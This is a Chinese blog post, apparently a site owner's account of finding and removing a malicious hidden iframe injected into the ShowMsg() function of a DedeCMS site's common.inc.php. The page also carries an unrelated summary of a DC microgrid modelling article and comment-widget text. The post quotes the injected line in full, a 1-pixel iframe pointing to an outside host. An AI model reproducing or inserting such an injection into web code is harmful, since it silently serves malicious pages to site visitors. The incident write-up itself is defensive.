dedecms做的网站给挂马

今天打开之前做的一个网站,发现360提示有挂马且已经成功拦截窗口,这时觉得奇怪的,连一个这样的网站也给挂马?接着打开网页,查看源代码,发现有一句<iframe....></iframe>这样的代码,这句在我原来良好网页代码里是不会出现的。可断定,就是因为这句代码所作的怪!

那就进行一步步的查代码吧!毕竟这个网站是用dedecms来做的,是开源的。但毕竟也不是自己写的,所以要查起来都比较麻烦。都唔知从什么地方下手好,后来打算重新生成一次静态页,在生成时就也同样提示这个窗,并且进入后台也出现这个窗口提示的。心想,那极有可能是在公用的PHP页面里给改了。

后来在清除页面缓存时无意中发现有一行细细的线,右键打开源代码,一看,也有一句iframe在,所以就决定在这个页面入手,查其模板文件,鼠标点击后提交到那个php的,慢慢一步步的查,特别是用了require_once这样的语句入的php页面,先查到引用了require_once(dirname(__FILE__)."/config.php");页,打开config.php后再发现又引用了require_once(DEDEADMIN.'/../include/common.inc.php');,再打开common.inc.php,CTRL+F,搜索iframe,就提示在函数ShowMsg()这个方法里多了一句:

<iframe src=http://kukebase.a54.huyi5.com/web.html width=123 height=1></iframe>
</head>\r\n<body leftmargin='0' topmargin='0'>


就是这句,将其删除后再重新生成一次静态页,没有提示了。只是右下角还有提示说网站发现有挂马的。不知道360什么时候再重新收录一次并清除这个提示呢?


问题解决了,就细想,如何挂马到我网页里的呢?并且更改的是后台用到的php这个页面,是如何做到的呢?常规的讲法就是网站上漏洞,上传了一些可执行的文件或php文件之类的,查看了一下,上传设置那里只允许了zip|gz|rar|iso|doc|xsl|ppt|wps|pdf|doc|xls这几个文件的,不知道是从什么地方上传上来的,用户中心是没有做的,所以说通过编辑器来上传又觉得不太可能。百思不得其解。


如你知道,麻烦你跟帖留言告知一声!谢谢!
【直流微电网】径向直流微电网的状态空间建模与线性化:一种耦合DC-DC变换器状态空间平均模型的方法 (Matlab代码实现)内容概要:本文介绍了径向直流微电网的状态空间建模与线性化方法,重点提出了一种基于耦合DC-DC变换器状态空间平均模型的建模策略。该方法通过对系统中多个相互耦合的DC-DC变换器进行统一建模,构建出整个微电网的集中状态空间模型,并在此基础上实施线性化处理,便于后续的小信号分析与稳定性研究。文中详细阐述了建模过程中的关键步骤,包括电路拓扑分析、状态变量选取、平均化处理以及雅可比矩阵的推导,最终通过Matlab代码实现模型仿真验证,展示了该方法在动态响应分析和控制器设计中的有效性。; 适合人群:具备电力电子、自动控制理论基础,熟悉Matlab/Simulink仿真工具,从事微电网、新能源系统建模与控制研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①掌握直流微电网中多变换器系统的统一建模方法;②理解状态空间平均法在非线性电力电子系统中的应用;③实现系统线性化并用于稳定性分析与控制器设计;④通过Matlab代码复现和扩展模型,服务于科研仿真与教学实践。; 阅读建议:建议读者结合Matlab代码逐步理解建模流程,重点关注状态变量的选择与平均化处理的数学推导,同时可尝试修改系统参数或拓扑结构以加深对模型通用性和适应性的理解。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值